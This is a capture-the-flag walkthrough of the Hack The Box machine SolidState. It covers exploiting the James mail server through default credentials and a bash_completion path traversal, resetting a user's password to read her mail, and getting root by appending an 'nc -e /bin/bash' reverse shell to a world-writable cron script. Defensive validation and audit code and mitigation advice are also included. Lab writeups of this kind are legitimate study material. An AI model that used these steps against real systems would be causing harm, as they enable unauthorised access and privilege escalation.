HTB: SolidState Writeup w/o Metasploit

cyber shinobii, published in System Weakness, Jan 14, 2022

Solidstate was another cool box to learn from. It introduced me to a new service and its vulnerabilities. Let’s get into how I popped it.

Recon

The first thing we did was run our nmap scans and quickly got a few ports back to work with.

nmap -Pn -sV 10.10.10.51 --top-ports 25 -oN version_scan

Port 80 was an open port, so we opened up a web browser to check it out.

http://10.10.10.51

After going to http://10.10.10.51, we learn that there isn't much for us to work with. It's a security consultancy website offering security-related services. We played around with the site, checked out the links, and fuzzed the input fields, but there wasn't anything useful at the moment.

Since there isn't much to work with on port 80 as of now, let's go back to our nmap results. FYI, we also ran a gobuster scan and didn't get much from that either. You can check it out in the video walkthrough.

Enumeration

Back to our nmap scan results. The version scan shows ports 25, 110, and 119 open, with a James service running on them. At the time, I didn't know what this service was. From the nmap results I could guess it's a mail service, since it's using the default mail ports 25 (SMTP) and 110 (POP3). At this point, I took a break to learn more about James so I could have a better understanding of what we're working with. Some simple Google Kung Fu gives us a remote code execution exploit.

https://www.exploit-db.com/exploits/50347

This exploit uses default James credentials to log in to the Remote Administration Tool and create a special user account. The account is "special" because its name appears to be abusing some type of directory traversal vulnerability. Nonetheless, after the exploit creates the account, it drops a payload in the account's home directory. The payload gets executed when a user connects to the box (10.10.10.51), for example by establishing a remote connection with ssh.

A few things to note before we run this exploit. First, the exploit uses default credentials to log in to the Remote Administration Tool (RAT). In the comments, the author shows us the default port the exploit uses to connect to the RAT.

The exploit connects to the RAT via port 4555. We didn't see this in our version scan, but it does come up in our full nmap scan.

nmap -n -Pn -p- --open 10.10.10.51 -oN full_scan

So if we use the default credentials (root:root), which is what the exploit uses, we should be able to connect to the RAT on port 4555.

Exploitation

Before we try that, let's start with the exploit we got from exploit-db. Fortunately the exploit is written in Python 3, so we don't need to make any adjustments for Python 2. If you run it without options, it shows how to use it.

The exploit is pretty straightforward. We just need to submit the remote ip (10.10.10.51), our local ip (10.10.14.7), and our listener port (1234). Make sure you have the listener started.

python3 exploit.py 10.10.10.51 10.10.14.7 1234

We get a message stating we need somebody to log in to the box to execute our payload. Remember, that's how the exploit was scripted: it places a payload in a user's directory, and after someone logs in it executes the payload. The "magic" behind this is bash_completion.

Remember, the script created a user named "../../../../../../../../etc/bash_completion.d". When that user is created, the "/etc/bash_completion.d" directory is also created as its mailbox, so anything we send via mail to that user gets stored in the bash_completion.d directory. If bash_completion is enabled, anything in that directory executes when a user signs into the machine. Here's a great writeup on the exploit.
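To make the root cause concrete from the server side, here is an added example (not code from the writeup and not James's own code) of the two checks a mail server should apply before mapping an account name to a mailbox directory: an allowlist on the name itself, and a containment check on the resolved path. The mailbox root path, the function names and the in-memory user store are assumptions made for this example; the traversal username is the one the exploit creates.

```python
import posixpath
import re

# Assumed mailbox root for this example; the writeup does not show where James
# kept mailboxes on the box, only that the traversal name landed in
# /etc/bash_completion.d.
MAILBOX_ROOT = "/var/mail/james/users"

# Allowlist: a lowercase letter, then up to 31 letters, digits, dots,
# underscores or dashes. Neither "/" nor ".." can pass this.
USERNAME_RE = re.compile(r"[a-z][a-z0-9._-]{0,31}")

# The account name the exploit registers through the RAT.
TRAVERSAL_NAME = "../../../../../../../../etc/bash_completion.d"


def username_is_wellformed(username: str) -> bool:
    """Layer 1: syntactic allowlist on the account name itself."""
    if not USERNAME_RE.fullmatch(username):
        return False
    # "a..b" satisfies the character class; refuse any run of dots anyway.
    return ".." not in username


def resolve_mailbox_dir(root: str, username: str):
    """Layer 2: resolve root/username and confirm it stays inside root.

    Returns the normalised mailbox path, or None if the name escapes the
    root (or is empty / ".", which would alias the root itself).
    """
    root_n = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_n, username))
    if candidate == root_n or not candidate.startswith(root_n + "/"):
        return None
    return candidate


def add_user(users: dict, username: str, root: str = MAILBOX_ROOT):
    """Hypothetical 'adduser' front end applying both layers.

    Returns (ok, detail): the mailbox path on success, otherwise the reason
    for refusal. `users` is an in-memory stand-in for the server's user store.
    """
    if not username_is_wellformed(username):
        return False, "username contains characters outside the allowlist"
    mailbox = resolve_mailbox_dir(root, username)
    if mailbox is None:
        return False, "username resolves outside the mailbox root"
    if username in users:
        return False, "user already exists"
    users[username] = mailbox
    return True, mailbox


if __name__ == "__main__":
    store = {}
    for name in ("mindy", TRAVERSAL_NAME, "mindy/../.."):
        ok, detail = add_user(store, name)
        print(f"{name!r}: {'created' if ok else 'rejected'} -> {detail}")
```

Either layer alone stops the exploit's username; keeping both means a later relaxation of the allowlist (say, to permit dots in names) still cannot turn a mailbox path into a write into /etc.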

So, we’ll either need to wait for someone to log in or log in as someone ourselves.

Let's pivot to the Remote Administration Tool. Remember, it was on port 4555 and uses root:root as the username and password. Let's use netcat to connect to it.

nc -nv 10.10.10.51 4555

We're connected to the James Remote Administration Tool. Running the help command shows a list of commands.

After observing the commands, analyzing what we have access to, and assessing what we need to do (execute our payload with a login), we decide to change everyone’s password. Why?

Well, we need more information to complete our exploit, and there may be useful information in these mailboxes. And if we change the passwords, we won't need to find the creds for these accounts. OK, so let's use a few of the commands we analyzed. Let's list the users with access to James by typing "listusers".

listusers

When I did this the first time, I changed everyone's password, logged into all of their accounts, and found what we needed in Mindy's mailbox. So we'll only focus on Mindy's account here. Let's change her password with the "setpassword" command.

setpassword mindy password123

Now that her password is changed, let's use telnet to log in. FYI, when I first did this I used netcat. Netcat didn't work, so I tried telnet and it worked out.

To connect, enter "telnet 10.10.10.51 110". Then enter "USER mindy", then "PASS password123". Now you should be logged in. We did that in the screenshot above.

Now use the "list" command to list her mail. We see there are two messages. We can use the "retr" command to retrieve the second email with "retr 2".

Guess what!? The email shows Mindy's ssh credentials. If we use them to log in as Mindy, the payload connects back to our listener.

Let's ssh into Mindy's account with "ssh mindy@10.10.10.51".

In the screenshot above, the top pane is where we ran ssh to Mindy's account, and the bottom pane is our netcat listener receiving a connection. You can see we ran "whoami" to show we're under Mindy's account. The top pane we used to run ssh is hung within a restricted shell: when you ssh to Mindy's account, it puts you in a restricted bash shell. You can break out of this by logging in with "ssh mindy@10.10.10.51 -t bash". I think you should be able to do the priv esc from that ssh access without the payload, but I didn't try it that way. I used the shell in the screenshot above to priv esc. OK, let's move forward with our current shell.

Privilege Escalation

Time to escalate privileges, because Mindy doesn't have root access. I transferred LinEnum to the target machine using a Python web server. First, we start the web server with "python3 -m http.server 8000".

Then we use wget to grab the file with "wget 10.10.14.12:8000/linenum.sh".

Now that the file is there, we make it executable with "chmod +x linenum.sh" and run it with "./linenum.sh -t". It returns a lot of information. Something interesting was the tmp.py file under the /opt/ directory. It has 777 (rwxrwxrwx) permissions set, so the owner, the group, and all other users can write to it. This means we can alter the file, and there's probably a cronjob running that executes it. FYI: there is a cronjob running as root that executes this file. We share that below, after the priv esc.

Ok, let’s open up the tmp.py script and see what’s inside.

It's a Python script that removes all directories and files from the /tmp/ directory. Since we have write permissions, let's write something that connects back to a listener. Initially, I tried uploading my own tmp.py with my script in it, but the upload failed since the directory is owned by root. So instead, I appended a command to the tmp.py script.

We do this by entering the following: echo "os.system('nc -e /bin/bash 10.10.14.12 443')" >> /opt/tmp.py. Make sure you have a listener started on the port you selected.

Afterwards, we just have to wait a few minutes to catch a connection from that tmp.py script. It takes 3 minutes, because there's a cronjob running every 3 minutes. After logging in as root I checked the crontab and saw it set there; the screenshot is below. After 3 minutes we get a connection back as the root account.

crontab -l
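As an added defensive example (not from the writeup), the following script audits a crontab for exactly the condition that enabled this privilege escalation: a scheduled command whose script file, or the directory holding it, is writable by everyone. The crontab text is constructed for this example, modelled on the writeup's description of root running /opt/tmp.py every 3 minutes (the real line is only visible in a screenshot), and build_demo_environment creates throwaway files in a temp directory so the check runs offline; on a real host you would feed it the output of "crontab -l" or the files under /etc/cron.d.

```python
import os
import re
import stat
import tempfile

# Constructed crontab text modelled on the writeup (the real line on the box
# is only shown in a screenshot): root runs /opt/tmp.py every 3 minutes.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
*/3 * * * * python /opt/tmp.py
0 2 * * * /usr/local/bin/backup.sh > /var/log/backup.log 2>&1
"""

# Five schedule fields (or an @reboot-style shortcut), then the command.
CRON_LINE_RE = re.compile(r"^\s*(?:@\w+\s+|(?:\S+\s+){5})(?P<cmd>\S.*)$")
# Absolute-path tokens inside a command, stopping at shell metacharacters.
PATH_TOKEN_RE = re.compile(r"(?<![\w.])/[^\s;|&<>]+")


def parse_cron_commands(crontab_text: str) -> list:
    """Return the command part of every non-comment, non-variable line."""
    commands = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if "=" in line.split()[0]:  # VAR=value environment lines
            continue
        m = CRON_LINE_RE.match(line)
        if m:
            commands.append(m.group("cmd").strip())
    return commands


def extract_paths(command: str) -> list:
    """Pull absolute-path tokens (script, interpreter, redirects) out of a command."""
    return PATH_TOKEN_RE.findall(command)


def describe_file(path: str):
    """Permission facts for a path, or None if it does not exist."""
    try:
        st = os.stat(path)
        parent = os.stat(os.path.dirname(path) or "/")
    except FileNotFoundError:
        return None
    return {
        "path": path,
        "mode": stat.S_IMODE(st.st_mode),
        "owner_uid": st.st_uid,
        "world_writable": bool(st.st_mode & stat.S_IWOTH),
        # A writable parent lets a user replace the file even if the file itself is 0644.
        "parent_world_writable": bool(parent.st_mode & stat.S_IWOTH),
    }


def audit(crontab_text: str) -> list:
    """One finding per existing file referenced by a scheduled command."""
    findings = []
    for cmd in parse_cron_commands(crontab_text):
        for path in extract_paths(cmd):
            info = describe_file(path)
            if info is not None:
                info["command"] = cmd
                findings.append(info)
    return findings


def flagged(findings: list) -> list:
    """Paths an unprivileged user could alter before cron executes them."""
    return [f["path"] for f in findings
            if f["world_writable"] or f["parent_world_writable"]]


def build_demo_environment():
    """Recreate the scenario under a temp dir: one 0777 script, one 0755 script.

    Returns (crontab_text, bad_path, good_path). The temp paths are constructed.
    """
    root = tempfile.mkdtemp(prefix="cron-audit-")
    bad = os.path.join(root, "opt", "tmp.py")
    good = os.path.join(root, "usr", "local", "bin", "backup.sh")
    for p in (bad, good):
        os.makedirs(os.path.dirname(p), exist_ok=True)
        os.chmod(os.path.dirname(p), 0o755)  # directories owned by root-style perms
        with open(p, "w") as fh:
            fh.write("#!/usr/bin/env python\n" if p == bad else "#!/bin/sh\n")
    os.chmod(bad, 0o777)   # the misconfiguration LinEnum surfaced on the box
    os.chmod(good, 0o755)
    crontab = (SAMPLE_CRONTAB
               .replace("/opt/tmp.py", bad)
               .replace("/usr/local/bin/backup.sh", good)
               .replace("/var/log/backup.log", os.path.join(root, "var", "log", "backup.log")))
    return crontab, bad, good


if __name__ == "__main__":
    crontab, bad, good = build_demo_environment()
    findings = audit(crontab)
    for f in findings:
        print(f"{oct(f['mode'])} uid={f['owner_uid']} {f['path']}  <- {f['command']}")
    print("writable cron targets:", flagged(findings))
```

The audit reports the 0777 tmp.py and stays quiet about the 0755 script, which is the distinction LinEnum's output made obvious here; running the same check as root against every user's crontab and the system cron directories turns the writeup's one-off finding into a repeatable control.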

Conclusion

Solidstate was another opportunity to gain more experience about a popular service and vulnerability. I personally learned a lot and had fun exploring everything we used to compromise this server. As a result, we have a few controls to suggest.

AAR

For starters, we should change the credentials James is using. We used them to log in to the RAT and change Mindy's password. If we didn't have those default credentials, we wouldn't have had access to Mindy's mailbox. Nonetheless, her credentials should be encrypted instead of sitting in plaintext in her email. If they were encrypted, using them would have been more difficult. Ultimately, changing the credentials and upgrading to a more secure version of James would have prevented the initial exploit.

In addition, another good countermeasure would be to disable bash_completion. This would help prevent malicious scripts from executing upon login, which is what we leveraged to execute our payload for the initial shell access.

Furthermore, we recommend hardening the host by removing the world-writable permissions from the tmp.py file that root executes every 3 minutes. Doing that will prevent the privilege escalation attack. Overall, this was a very exciting box to work with. I hope you enjoyed this writeup as much as I did. Here is the video walkthrough. Thanks!
